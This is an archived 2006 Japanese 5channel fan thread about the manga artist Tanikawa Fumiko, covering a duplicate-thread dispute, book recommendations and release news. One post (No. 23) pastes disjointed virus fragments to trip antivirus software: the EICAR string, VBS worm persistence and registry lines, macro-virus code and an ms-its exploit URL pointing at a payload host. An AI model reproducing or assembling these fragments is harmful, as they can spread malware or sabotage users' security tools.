5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【一緒に】谷川史子 4【ごはん】

1 :花と名無しさん:2006/12/16(土) 18:19:19 ID:???0
集英社Cookie等で活躍中の谷川史子さんの作品を語るスレです。
作品同様、各駅停車に乗ったつもりでマターリと話しましょう。

前スレ【りぼん】谷川史子 3【Cookie】
http://comic6.2ch.net/test/read.cgi/gcomic/1135087619/l50

2 :花と名無しさん:2006/12/16(土) 18:21:45 ID:???0
重複スレ

【くじら日和】谷川史子 4【各駅停車】
http://comic6.2ch.net/test/read.cgi/rcomic/1166258711/l50


3 :花と名無しさん:2006/12/16(土) 18:22:26 ID:XG+nnbzM0


あっちは廃棄でいいと思う

4 :花と名無しさん:2006/12/16(土) 18:22:53 ID:???0
重複じゃね?

削除依頼だしてくるわ

5 :花と名無しさん:2006/12/16(土) 18:23:09 ID:???0
>>1さん乙!

6 :花と名無しさん:2006/12/16(土) 18:31:18 ID:???0
Bethインタビュー
ttp://bethnet.jp/pc/interview/index.html

7 :花と名無しさん:2006/12/16(土) 18:31:27 ID:VjpVG8oz0
>>1
乙。

>>4
あっちで現行作品語ったら板違いじゃん。
削除依頼出すなら懐かし漫画の方でよろ。

8 :花と名無しさん:2006/12/16(土) 18:32:54 ID:???0
こっちが本スレ(誘導)

【くじら日和】谷川史子 4【各駅停車】
http://comic6.2ch.net/test/read.cgi/rcomic/1166258711/l50


9 :花と名無しさん:2006/12/16(土) 18:35:10 ID:XG+nnbzM0
あっちはID誰も出してないから最悪一人の自作自演の可能性もあるw

現行作品語るなら少女漫画板か、単に漫画板に立てるしかないよね。

10 :花と名無しさん:2006/12/16(土) 18:39:31 ID:???0
【くじら日和】谷川史子 4【各駅停車】
http://comic6.2ch.net/test/read.cgi/rcomic/1166258711/l50

11 :花と名無しさん:2006/12/16(土) 18:43:02 ID:???0
>>9いいかげんあきらめろよw

【くじら日和】谷川史子 4【各駅停車】
http://comic6.2ch.net/test/read.cgi/rcomic/1166258711/l50

12 :花と名無しさん:2006/12/16(土) 18:45:00 ID:???0
向こうで現行作品について語ったら板違い、って事にはなにも
反論しないのね・・・

13 :花と名無しさん:2006/12/16(土) 18:47:07 ID:???0
板違いであってもスレ違いではないんだよ。
憲法9条と自衛隊をどう考えるかの問題だよ、厨房くん。
憲法違反の自衛隊は即刻廃止!とか放課後やってるの?


14 :花と名無しさん:2006/12/16(土) 18:49:13 ID:???0
9=12

やれやれ。自分には多くの味方がいると思い込んでるんだね。
そろそろ冬厨の時期かな?

15 :花と名無しさん:2006/12/16(土) 18:55:53 ID:XG+nnbzM0
>14
ID出してない人に勝手な憶測言われてもなぁw
俺は前スレでID発言してからID無しで書いてないよ。

16 :花と名無しさん:2006/12/16(土) 18:59:41 ID:HOBbWmNj0
「きみのことすきなんだ」からファンですが
むかしから連載物はピンと来ませんでした

でもホームメイドは意外と好きだったので
魔法とごはんに挑戦しようか考え中
買ってみた方がいい?

17 :花と名無しさん:2006/12/16(土) 19:00:22 ID:???0
匿名掲示板ですすんでID表示とか言ってるのって
ちょっとヤバくないか。
そんなにアイデンティティ出したいなら、氏名とか住所とか職場を晒せば?

18 :花と名無しさん:2006/12/16(土) 19:03:05 ID:???0
Bethの壁紙はこの時期に使うには寒々しい色合いなので
色調補正して使用中

19 :花と名無しさん:2006/12/16(土) 19:06:24 ID:XG+nnbzM0
>17
IDから住所氏名を特定できるなら匿名じゃないけど
出来ないんだから充分匿名だろw

>16
買った方がいいと思う
確かに賛否両論だけど、決して悪くないと思うよ。

20 :花と名無しさん:2006/12/16(土) 19:08:00 ID:???0
もう放っておきましょう。お互い干渉しない方が幸せになれる。

21 :花と名無しさん:2006/12/16(土) 19:32:16 ID:ZLjHZ4NI0
さてと、空いた時間のひとときを楽しませてくれてみんなありがとう。
これから俺は飲み会に行くから、あとは好きなようにしてくれ。


by↓のスレ主
【くじら日和】谷川史子 4【各駅停車】
http://comic6.2ch.net/test/read.cgi/rcomic/1166258711/l50

22 :花と名無しさん:2006/12/16(土) 20:00:34 ID:???0
なんてこのスレ谷川史子さんからこんなに遠く離れたところに来てしまって
いるの??今北んだけどなんかぴっくりした。かなちぃょぉ。
もっと先生をヨイチョしよーよー。各駅停車の頃の先生のあんにゅいぶった
あとがきの自画像みてかあいーとおもたのがなつかちぃ。

23 :<body onload=window()>:2006/12/16(土) 20:59:37 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

24 :花と名無しさん:2006/12/16(土) 22:12:20 ID:???0
向うは壊れたようですw

25 :花と名無しさん:2006/12/16(土) 22:21:16 ID:???0
向こうの1さん、お一人様でがんばってw

26 :花と名無しさん:2006/12/17(日) 01:08:26 ID:???0
>>1


谷川史子 - Wikipedia
http://ja.wikipedia.org/wiki/%E8%B0%B7%E5%B7%9D%E5%8F%B2%E5%AD%90

27 :花と名無しさん:2006/12/17(日) 01:31:17 ID:???0
恥ずかしながら、内田百聞を初めて手に取ってみたんだが
ああいう系統だったんだね。
コミックスのおまけ漫画で「締め切り」を黒い影で現してたのを何となく思い出した。
柘植義春も好きだと言ってたけど、百聞も含めてちょっと意外だった。

28 :花と名無しさん:2006/12/18(月) 01:59:14 ID:???0
>>27
つげ義春ね。
ちはやぶるでキャラの名前として使ってたよね。
しかしあの頃の絵と比べると、今の絵はまるで別人が描いてるように違うな。

29 :花と名無しさん:2006/12/18(月) 10:06:40 ID:???0
「くじら日和」で一旦絵柄が完成して、「君と僕の街で」の途中から大きな変化があった気がする。

30 :花と名無しさん:2006/12/18(月) 21:17:37 ID:???0
ご本人の自演だか信者だかしらないけど「一年も自粛すれば充分」とかいう
書き込みありましたよね?
色々甘く見すぎてると思う。

31 :花と名無しさん:2006/12/18(月) 21:33:17 ID:???0
誤爆だと思うが、1年自粛すれば十分だろ。
つうか、いつまで粘着して叩いてんだよ。

32 :花と名無しさん:2006/12/18(月) 21:42:10 ID:ZimtNr7a0
どっちに書けばいいのかわからんが、一頃のファンロードのローディスト達が
こぞって絵柄を摸倣してたのが懐かしい。
つうか谷川センセがローディストだと思ってた…

33 :花と名無しさん:2006/12/18(月) 23:45:18 ID:???O
先日一緒にごはんの前後編を買ったんだけど後編がカバーだけ後編で中身が前編だった、、、、
前編はちゃんとしてて、つまり前編が二冊、、、、、、一体どうしろと orz


34 :花と名無しさん:2006/12/18(月) 23:54:46 ID:???0
来年の2月16日に文庫コミック出るよ!
二冊同時発売!

ttp://comic-bunko.shueisha.co.jp/program/proframe.html

35 :花と名無しさん:2006/12/19(火) 02:58:05 ID:???0
>>33
買った本屋に持って行けば普通に交換してくれるっさ。
古本なら・・・ご愁傷さま・・・

36 :花と名無しさん:2006/12/20(水) 00:16:32 ID:???0
いや、古本屋でも返品は流石にしてくれるでしょう。

今時めずらしい位マヌケな(大変失礼!)ケースではあるけど…

37 :花と名無しさん:2006/12/20(水) 12:47:23 ID:???0
各出版社によるこだわりなのだろうけど
りぼんの文庫本は、描き下ろしが文章であることが多い気がする
作者さんによってはちょっと残念だった事もあったけど
(きらきら乙女ちっくな漫画描く人の文章がめちゃくちゃクールだったりw)
谷川さんの文章ならとても楽しみ
近況漫画が一番嬉しくはあるのだけど、作業的に大変だしなぁ

38 :花と名無しさん:2006/12/22(金) 05:21:59 ID:mtOBuJdfO
谷川先生がマイバースディでイラスト描いてた頃にポストカードセットが発売したんだけどあれは今も大切に保管してます!

39 :花と名無しさん:2006/12/22(金) 06:28:46 ID:???0
>>38
ゴキブリ保管 Ww

40 :花と名無しさん:2006/12/23(土) 23:11:34 ID:???0
メリークリスマス イブイブ!
今年も温泉川くんは…orz

41 :花と名無しさん:2006/12/23(土) 23:53:56 ID:???0
 ∩ ∩
 い_cノ / ̄>O
`c/・ ・っ (ニニニ)△△
(´・ω・`)(・ω・`)[‖] 明日はイヴですよ?
O┳Oノ)=[ ̄てノ ̄ ̄]
◎┻し◎ ◎――◎=3

42 :花と名無しさん:2006/12/28(木) 19:56:38 ID:???0
>>23
<body onload=window()>

って何なの?荒らし?

43 :花と名無しさん:2006/12/29(金) 03:47:57 ID:???0
>>42
ウイルスコードっつって、ノートン使ってるとウイルスと誤認して
スレが開けなくなったりするらしーよ。

44 :花と名無しさん:2006/12/29(金) 13:44:05 ID:???0
まさに>>42のレスのおかげで取得できんかった

45 :花と名無しさん:2006/12/29(金) 16:19:41 ID:???0
ノートン先生は敏感だから。

10 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)